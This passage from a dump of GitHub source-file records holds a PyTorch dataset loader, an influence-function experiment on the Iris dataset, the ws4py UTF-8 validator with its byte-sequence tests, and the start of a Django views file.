"askshatriy@ukr.net"
] |
askshatriy@ukr.net
|
61496518c7782cbc99ab59bb0f240368c572137d
|
6fda3d57556c381de407898710b02244561ffa4e
|
/load_datasets.py
|
c6bd1af889b12f860b070b4aeab2aaf412827bd7
|
[] |
no_license
|
pachecobeto95/Quality_POPEX
|
46679f7319aff44675b3ec41be2a4551a611e3d4
|
e98987c5ff8836723ef227c685dcd7d10363522b
|
refs/heads/master
| 2023-03-31T04:11:29.868823
| 2021-04-03T19:17:35
| 2021-04-03T19:17:35
| 335,408,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,288
|
py
|
import torch
import torchvision.transforms as transforms
from torchvision import datasets
from torch.utils.data import Dataset, DataLoader, random_split, SubsetRandomSampler
class LoadDataset():
def __init__(self, input_dim, batch_size_train, batch_size_test):
self.input_dim = input_dim
self.batch_size_train = batch_size_train
self.batch_size_test = batch_size_test
self.transformation_list = transforms.Compose([transforms.Resize(input_dim),
transforms.CenterCrop(input_dim),
transforms.ToTensor()])
def cifar_10(self):
# Load Cifar-10 dataset
root = "cifar_10"
trainset = datasets.CIFAR10(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR10(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def cifar_100(self):
# Load Cifar-100 dataset
root = "cifar_100"
trainset = datasets.CIFAR100(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR100(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def imageNet(self, root_path):
# Load ImageNet Dataset
test_dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
_, val_dataset = random_split(test_dataset, (0, 50000))
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
return None, val_loader
def caltech(self, root_path, split_train=0.8):
dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
train_size = int(split_train*len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, (train_size, test_size))
train_dataset, val_dataset = random_split(train_dataset, (int(split_train*len(train_dataset)), len(train_dataset) - int(split_train*len(train_dataset))))
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=self.batch_size_train)
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=self.batch_size_test)
return train_loader, val_loader, test_loader
|
[
"robertopvc@gmail.com"
] |
robertopvc@gmail.com
|
07668772edfbe22ce75606f7b2dbddeeadeb083a
|
efcd8ea3f5419cd7d6eb7406875b7f727291492f
|
/IRIS/width_wise_l2/8w_l2.py
|
46704866ad62a1cdd2b0e5d8b54f553a21f127d6
|
[
"MIT"
] |
permissive
|
jrepifano/xai_is_fragile
|
936612c2ecf7b020ab1a75719d18bff9bed564d2
|
fd7e21355582543fa2d00bf9f48d3e12725c3fb6
|
refs/heads/main
| 2023-08-28T00:45:36.066073
| 2021-11-13T20:12:51
| 2021-11-13T20:12:51
| 346,057,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,542
|
py
|
import os
import time
import torch
import numpy as np
from pyhessian import hessian
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from scipy.stats import pearsonr, spearmanr
from sklearn.model_selection import LeaveOneOut
from sklearn.preprocessing import StandardScaler
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '3'
# Random Seed - Negating the randomizing effect
np.random.seed(6)
# Seeds : 2, 5, 10, 13, 15, 20
# Random Seed for tensorflow
torch.manual_seed(14)
class Model(torch.nn.Module):
def __init__(self, n_feats, n_nodes, n_classes):
super(Model, self).__init__()
self.lin1 = torch.nn.Linear(n_feats, n_nodes)
self.lin_last = torch.nn.Linear(n_nodes, n_classes)
self.relu = torch.nn.SELU()
def forward(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
x = self.lin_last(x)
return x
def bottleneck(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
return x
def fit(self, x, y, no_epochs=1000):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3, weight_decay=0.005)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=100, verbose=False)
for epoch in range(no_epochs):
optimizer.zero_grad()
logits = self.forward(x)
loss = criterion(logits, y)
loss.backward()
optimizer.step()
scheduler.step(loss.item())
def score(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
logits = torch.nn.functional.softmax(self.forward(x), dim=1)
score = torch.sum(torch.argmax(logits, dim=1) == y)/len(x)
return score.cpu().numpy()
def get_indiv_loss(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss(reduction='none')
logits = self.forward(x)
loss = criterion(logits, y)
return [l.item() for l in loss] if len(loss) > 1 else loss.item()
class influence_wrapper:
def __init__(self, model, x_train, y_train, x_test=None, y_test=None):
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.model = model
self.device = 'cuda:0' if next(self.model.parameters()).is_cuda else 'cpu'
def get_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train[self.pointer].reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor([self.y_train[self.pointer]], device=self.device))
return loss
def get_train_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train)
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_train, device=self.device))
return loss
def get_test_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_test.reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_test, device=self.device))
return loss
def get_hessian(self, weights):
dim_1, dim_2 = weights.shape[0], weights.shape[1]
H_i = torch.zeros((dim_1, dim_2, dim_1, dim_2), device=self.device)
for i in range(len(self.x_train)):
self.pointer = i
H_i += torch.autograd.functional.hessian(self.get_loss, weights, vectorize=True)
H = H_i / len(self.x_train)
square_size = int(np.sqrt(torch.numel(H)))
H = H.view(square_size, square_size)
return H
def LiSSA(self, v, weights):
count = 0
cur_estimate = v
damping = 0
scale = 10
num_samples = len(self.x_train)
prev_norm = 1
diff = prev_norm
ihvp = None
for i in range(len(self.x_train)):
self.pointer = i
while diff > 0.00001 and count < 10000:
hvp = torch.autograd.functional.hvp(self.get_train_loss, weights, cur_estimate)[1]
cur_estimate = [a + (1 - damping) * b - c / scale for (a, b, c) in zip(v, cur_estimate, hvp)]
cur_estimate = torch.squeeze(torch.stack(cur_estimate)) # .view(1, -1)
numpy_est = cur_estimate.detach().cpu().numpy()
numpy_est = numpy_est.reshape(1, -1)
count += 1
diff = abs(np.linalg.norm(np.concatenate(numpy_est)) - prev_norm)
prev_norm = np.linalg.norm(np.concatenate(numpy_est))
if ihvp is None:
ihvp = [b/scale for b in cur_estimate]
else:
ihvp = [a + b/scale for (a, b) in zip(ihvp, cur_estimate)]
ihvp = torch.squeeze(torch.stack(ihvp))
ihvp = [a / num_samples for a in ihvp]
ihvp = torch.squeeze(torch.stack(ihvp))
return ihvp.detach()
def i_up_params(self, weights, idx, estimate=False):
i_up_params = list()
if estimate:
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_params.append(self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss, weights, grad)[1], weights).detach().cpu().numpy())
else:
H = self.get_hessian(self.model.lin_last.weight)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
orig_shape = grad.shape
i_up_params.append((H_inv @ grad.float().view(-1, 1)).view(orig_shape).detach().cpu().numpy())
return i_up_params
def i_up_loss(self, weights, idx, estimate=False):
i_up_loss = list()
test_grad = torch.autograd.grad(self.get_test_loss(weights), weights)[0]
if estimate:
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss,
weights, train_grad)[1], weights).view(-1, 1)).detach().cpu().numpy()[0][0])
else:
H = self.get_hessian(weights)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ (H_inv @ train_grad.float().view(-1, 1))).item())
return i_up_loss
def get_hessian_info(model, x, y):
device = 'cuda:0' if next(model.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
hessian_comp = hessian(model, criterion, data=(x, y), cuda=True)
top_eigenvalues, top_eigenvector = hessian_comp.eigenvalues()
return top_eigenvalues[-1]
def find_max_loss():
x, y = load_iris(return_X_y=True)
loo = LeaveOneOut()
train_acc, test_loss, y_pred = list(), list(), list()
for train_index, test_index in loo.split(x):
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train)
train_acc.append(model.score(x_train, y_train))
test_loss.append(model.get_indiv_loss(x_test, y_test))
y_pred.append(torch.argmax(torch.nn.functional.softmax(model(x_test), dim=1)).item())
train_acc = np.mean(train_acc)
test_acc = accuracy_score(y, y_pred)
max_loss = np.argmax(test_loss)
return max_loss, train_acc, test_acc
def find_top_train(max_loss=83):
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train, 60000)
train_acc = model.score(x_train, y_train)
train_loss = model.get_indiv_loss(x_train, y_train)
to_look = int(1/6 * len(x-1))
top_train = np.argsort(train_loss)[::-1][:to_look]
top_eig = get_hessian_info(model, x_train, y_train)
torch.save(model.state_dict(), 'loo_params_8w.pt')
return top_train, model, top_eig, train_acc
def exact_difference(model, top_train, max_loss):
exact_loss_diff = list()
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
true_loss = model.get_indiv_loss(x_test, y_test)
for i in top_train:
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
x_train, y_train = np.delete(x_train, i, 0), np.delete(y_train, i, 0)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.load_state_dict(torch.load('loo_params_8w.pt'))
model.fit(x_train, y_train, 7500)
exact_loss_diff.append(model.get_indiv_loss(x_test, y_test) - true_loss)
return exact_loss_diff
def approx_difference(model, top_train, max_loss):
model.load_state_dict(torch.load('loo_params_8w.pt'))
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
infl = influence_wrapper(model, x_train, y_train, x_test, y_test)
approx_loss_diff = np.asarray(infl.i_up_loss(model.lin_last.weight, top_train, estimate=False))
return approx_loss_diff
def main():
outer_start_time = time.time()
train, eig, pearson, spearman = list(), list(), list(), list()
for i in range(1):
start_time = time.time()
# max_loss, train_acc, test_acc = find_max_loss() # 83 is always the highest loss then 133, 70, 77
# print('Done max loss')
max_loss = 83
top_train, model, top_eig, train_acc = find_top_train(max_loss)
print('Done top train')
exact_loss_diff = exact_difference(model, top_train, max_loss)
print('Done Exact Diff')
approx_loss_diff = approx_difference(model, top_train, max_loss)
train.append(train_acc)
eig.append(top_eig)
pearson.append(pearsonr(exact_loss_diff, approx_loss_diff)[0])
spearman.append(spearmanr(exact_loss_diff, approx_loss_diff)[0])
print('Done {}/{} in {:.2f} minutes'.format(i+1, 10, (time.time()-start_time)/60))
if i % 10 == 0:
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
print('Finished Iter in {:.2f} minutes'.format((time.time()-outer_start_time)/60))
pass
if __name__ == '__main__':
main()
|
[
"jrepifano@gmail.com"
] |
jrepifano@gmail.com
|
43a1a88455943cde239ee14c15fa12fc73f1c4f9
|
3cf5638a12bb6a03a40aaffcab15b1789546948d
|
/ws4py/utf8validator.py
|
b457768a61646dc7cb6de895077c599b37bfe646
|
[] |
no_license
|
GDur/LiveProcessingJs
|
8afeed64777d1df977967856f2c8b592ff671438
|
7b2c5a0e4cee0926a8c289e297cdb470a7fe48b2
|
refs/heads/master
| 2016-09-06T07:55:21.240721
| 2012-12-08T11:14:19
| 2012-12-08T11:14:19
| 6,513,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,283
|
py
|
# coding=utf-8
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Note:
##
## This code is a Python implementation of the algorithm
##
## "Flexible and Economical UTF-8 Decoder"
##
## by Bjoern Hoehrmann
##
## bjoern@hoehrmann.de
## http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
class Utf8Validator:
"""
Incremental UTF-8 validator with constant memory consumption (minimal state).
Implements the algorithm "Flexible and Economical UTF-8 Decoder" by
Bjoern Hoehrmann (http://bjoern.hoehrmann.de/utf-8/decoder/dfa/).
"""
## DFA transitions
UTF8VALIDATOR_DFA = [
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 00..1f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 20..3f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 40..5f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 60..7f
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, # 80..9f
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, # a0..bf
8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, # c0..df
0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, # e0..ef
0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, # f0..ff
0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, # s0..s0
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, # s1..s2
1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, # s3..s4
1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, # s5..s6
1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # s7..s8
]
UTF8_ACCEPT = 0
UTF8_REJECT = 1
def __init__(self):
self.reset()
def decode(self, b):
"""
Eat one UTF-8 octet, and validate on the fly.
Returns UTF8_ACCEPT when enough octets have been consumed, in which case
self.codepoint contains the decoded Unicode code point.
Returns UTF8_REJECT when invalid UTF-8 was encountered.
Returns some other positive integer when more octets need to be eaten.
"""
type = Utf8Validator.UTF8VALIDATOR_DFA[b]
if self.state != Utf8Validator.UTF8_ACCEPT:
self.codepoint = (b & 0x3f) | (self.codepoint << 6)
else:
self.codepoint = (0xff >> type) & b
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + self.state * 16 + type]
return self.state
def reset(self):
"""
Reset validator to start new incremental UTF-8 decode/validation.
"""
self.state = Utf8Validator.UTF8_ACCEPT
self.codepoint = 0
self.i = 0
def validate(self, ba):
"""
Incrementally validate a chunk of bytes provided as bytearray.
Will return a quad (valid?, endsOnCodePoint?, currentIndex, totalIndex).
As soon as an octet is encountered which renders the octet sequence
invalid, a quad with valid? == False is returned. currentIndex returns
the index within the currently consumed chunk, and totalIndex the
index within the total consumed sequence that was the point of bail out.
When valid? == True, currentIndex will be len(ba) and totalIndex the
total amount of consumed bytes.
"""
l = len(ba)
for i in xrange(0, l):
## optimized version of decode(), since we are not interested in actual code points
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + (self.state << 4) + Utf8Validator.UTF8VALIDATOR_DFA[ba[i]]]
if self.state == Utf8Validator.UTF8_REJECT:
self.i += i
return False, False, i, self.i
self.i += l
return True, self.state == Utf8Validator.UTF8_ACCEPT, l, self.i
UTF8_TEST_SEQUENCES = []
def setTestSequences():
"""
Setup test sequences for UTF-8 decoder tests from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
# 1 Some correct UTF-8 text
vss = '\xce\xba\xe1\xbd\xb9\xcf\x83\xce\xbc\xce\xb5'
vs = ["Some valid UTF-8 sequences", []]
vs[1].append((True, vss))
UTF8_TEST_SEQUENCES.append(vs)
# All prefixes of correct UTF-8 text
vs = ["All prefixes of a valid UTF-8 string that contains multi-byte code points", []]
v = Utf8Validator()
for i in xrange(1, len(vss) + 1):
v.reset()
res = v.validate(bytearray(vss[:i]))
vs[1].append((res[0] and res[1], vss[:i]))
UTF8_TEST_SEQUENCES.append(vs)
# 2.1 First possible sequence of a certain length
vs = ["First possible sequence of a certain length", []]
vs[1].append((True, '\x00'))
vs[1].append((True, '\xc2\x80'))
vs[1].append((True, '\xe0\xa0\x80'))
vs[1].append((True, '\xf0\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["First possible sequence length 5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf8\x88\x80\x80\x80'))
vs[1].append((False, '\xfc\x84\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.2 Last possible sequence of a certain length
vs = ["Last possible sequence of a certain length", []]
vs[1].append((True, '\x7f'))
vs[1].append((True, '\xdf\xbf'))
vs[1].append((True, '\xef\xbf\xbf'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# the following conform to the UTF-8 integer encoding scheme, but
# valid UTF-8 only allows for Unicode code points up to U+10FFFF
vs = ["Last possible sequence length 4/5/6 (invalid codepoints)", []]
vs[1].append((False, '\xf7\xbf\xbf\xbf'))
vs[1].append((False, '\xfb\xbf\xbf\xbf\xbf'))
vs[1].append((False, '\xfd\xbf\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 2.3 Other boundary conditions
vs = ["Other boundary conditions", []]
vs[1].append((True, '\xed\x9f\xbf'))
vs[1].append((True, '\xee\x80\x80'))
vs[1].append((True, '\xef\xbf\xbd'))
vs[1].append((True, '\xf4\x8f\xbf\xbf'))
vs[1].append((False, '\xf4\x90\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 3.1 Unexpected continuation bytes
vs = ["Unexpected continuation bytes", []]
vs[1].append((False, '\x80'))
vs[1].append((False, '\xbf'))
vs[1].append((False, '\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80'))
vs[1].append((False, '\x80\xbf\x80\xbf\x80\xbf'))
s = ""
for i in xrange(0x80, 0xbf):
s += chr(i)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.2 Lonely start characters
vs = ["Lonely start characters", []]
m = [(0xc0, 0xdf), (0xe0, 0xef), (0xf0, 0xf7), (0xf8, 0xfb), (0xfc, 0xfd)]
for mm in m:
s = ''
for i in xrange(mm[0], mm[1]):
s += chr(i)
s += chr(0x20)
vs[1].append((False, s))
UTF8_TEST_SEQUENCES.append(vs)
# 3.3 Sequences with last continuation byte missing
vs = ["Sequences with last continuation byte missing", []]
k = ['\xc0', '\xe0\x80', '\xf0\x80\x80', '\xf8\x80\x80\x80', '\xfc\x80\x80\x80\x80',
'\xdf', '\xef\xbf', '\xf7\xbf\xbf', '\xfb\xbf\xbf\xbf', '\xfd\xbf\xbf\xbf\xbf']
for kk in k:
vs[1].append((False, kk))
UTF8_TEST_SEQUENCES.append(vs)
# 3.4 Concatenation of incomplete sequences
vs = ["Concatenation of incomplete sequences", []]
vs[1].append((False, ''.join(k)))
UTF8_TEST_SEQUENCES.append(vs)
# 3.5 Impossible bytes
vs = ["Impossible bytes", []]
vs[1].append((False, '\xfe'))
vs[1].append((False, '\xff'))
vs[1].append((False, '\xfe\xfe\xff\xff'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.1 Examples of an overlong ASCII character
vs = ["Examples of an overlong ASCII character", []]
vs[1].append((False, '\xc0\xaf'))
vs[1].append((False, '\xe0\x80\xaf'))
vs[1].append((False, '\xf0\x80\x80\xaf'))
vs[1].append((False, '\xf8\x80\x80\x80\xaf'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\xaf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.2 Maximum overlong sequences
vs = ["Maximum overlong sequences", []]
vs[1].append((False, '\xc1\xbf'))
vs[1].append((False, '\xe0\x9f\xbf'))
vs[1].append((False, '\xf0\x8f\xbf\xbf'))
vs[1].append((False, '\xf8\x87\xbf\xbf\xbf'))
vs[1].append((False, '\xfc\x83\xbf\xbf\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 4.3 Overlong representation of the NUL character
vs = ["Overlong representation of the NUL character", []]
vs[1].append((False, '\xc0\x80'))
vs[1].append((False, '\xe0\x80\x80'))
vs[1].append((False, '\xf0\x80\x80\x80'))
vs[1].append((False, '\xf8\x80\x80\x80\x80'))
vs[1].append((False, '\xfc\x80\x80\x80\x80\x80'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.1 Single UTF-16 surrogates
vs = ["Single UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80'))
vs[1].append((False, '\xed\xad\xbf'))
vs[1].append((False, '\xed\xae\x80'))
vs[1].append((False, '\xed\xaf\xbf'))
vs[1].append((False, '\xed\xb0\x80'))
vs[1].append((False, '\xed\xbe\x80'))
vs[1].append((False, '\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.2 Paired UTF-16 surrogates
vs = ["Paired UTF-16 surrogates", []]
vs[1].append((False, '\xed\xa0\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xa0\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xad\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xad\xbf\xed\xbf\xbf'))
vs[1].append((False, '\xed\xae\x80\xed\xb0\x80'))
vs[1].append((False, '\xed\xae\x80\xed\xbf\xbf'))
vs[1].append((False, '\xed\xaf\xbf\xed\xb0\x80'))
vs[1].append((False, '\xed\xaf\xbf\xed\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# 5.3 Other illegal code positions
# Those are non-character code points and valid UTF-8 by RFC 3629
vs = ["Non-character code points (valid UTF-8)", []]
vs[1].append((True, '\xef\xbf\xbe'))
vs[1].append((True, '\xef\xbf\xbf'))
UTF8_TEST_SEQUENCES.append(vs)
# Unicode replacement character
vs = ["Unicode replacement character", []]
vs[1].append((True, '\xef\xbf\xbd'))
UTF8_TEST_SEQUENCES.append(vs)
setTestSequences()
def test_utf8():
"""
These tests verify the UTF-8 decoder/validator on the various test cases from
http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt
"""
v = Utf8Validator()
vs = []
for k in UTF8_TEST_SEQUENCES:
vs.extend(k[1])
# All Unicode code points
for i in xrange(0, 0xffff): # should by 0x10ffff, but non-wide Python build is limited to 16-bits
if i < 0xD800 or i > 0xDFFF: # filter surrogate code points, which are disallowed to encode in UTF-8
vs.append((True, unichr(i).encode("utf-8")))
# 5.1 Single UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
for i in xrange(0xDC00, 0xDFFF): # low-surrogate
ss = unichr(i).encode("utf-8")
vs.append((False, ss))
# 5.2 Paired UTF-16 surrogates
for i in xrange(0xD800, 0xDBFF): # high-surrogate
for j in xrange(0xDC00, 0xDFFF): # low-surrogate
ss1 = unichr(i).encode("utf-8")
ss2 = unichr(j).encode("utf-8")
vs.append((False, ss1 + ss2))
vs.append((False, ss2 + ss1))
# now test and assert ..
for s in vs:
v.reset()
r = v.validate(bytearray(s[1]))
res = r[0] and r[1] # no UTF-8 decode error and everything consumed
assert res == s[0]
def test_utf8_incremental():
"""
These tests verify that the UTF-8 decoder/validator can operate incrementally.
"""
v = Utf8Validator()
v.reset()
assert (True, True, 15, 15) == v.validate(bytearray("µ@ßöäüàá"))
v.reset()
assert (False, False, 0, 0) == v.validate(bytearray([0xF5]))
## the following 3 all fail on eating byte 7 (0xA0)
v.reset()
assert (True, True, 6, 6) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64]))
assert (False, False, 1, 7) == v.validate(bytearray([0xED, 0xA0, 0x80]))
v.reset()
assert (True, True, 4, 4) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74]))
assert (False, False, 3, 7) == v.validate(bytearray([0x65, 0x64, 0xED, 0xA0, 0x80]))
v.reset()
assert (True, False, 7, 7) == v.validate(bytearray([0x65, 0x64, 0x69, 0x74, 0x65, 0x64, 0xED]))
assert (False, False, 0, 7) == v.validate(bytearray([0xA0, 0x80]))
if __name__ == '__main__':
"""
Run unit tests.
"""
test_utf8_incremental()
test_utf8()
|
[
"gdur.mugen@googlemail.com"
] |
gdur.mugen@googlemail.com
|
c0b9fba0df580154ea29be2dc724cbe802318450
|
b8120b9a99b1aab3fa423bc28173b10523084301
|
/app/views.py
|
3980e892431891877c72c44e2da6ae5298a24185
|
[] |
no_license
|
Trailblazerr1/iiita-hacks-musify
|
e0cc22a95b164399462750e5667b886090ca17bb
|
d7ab39622306e48e280fb350b9f416b64dc95f37
|
refs/heads/master
| 2020-12-25T14:38:34.028923
| 2016-09-12T11:28:49
| 2016-09-12T11:28:49
| 67,906,279
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,195
|
py
|
"""
Definition of views.
"""
from django.shortcuts import render
from django.http import HttpRequest
from django.template import RequestContext
from datetime import datetime
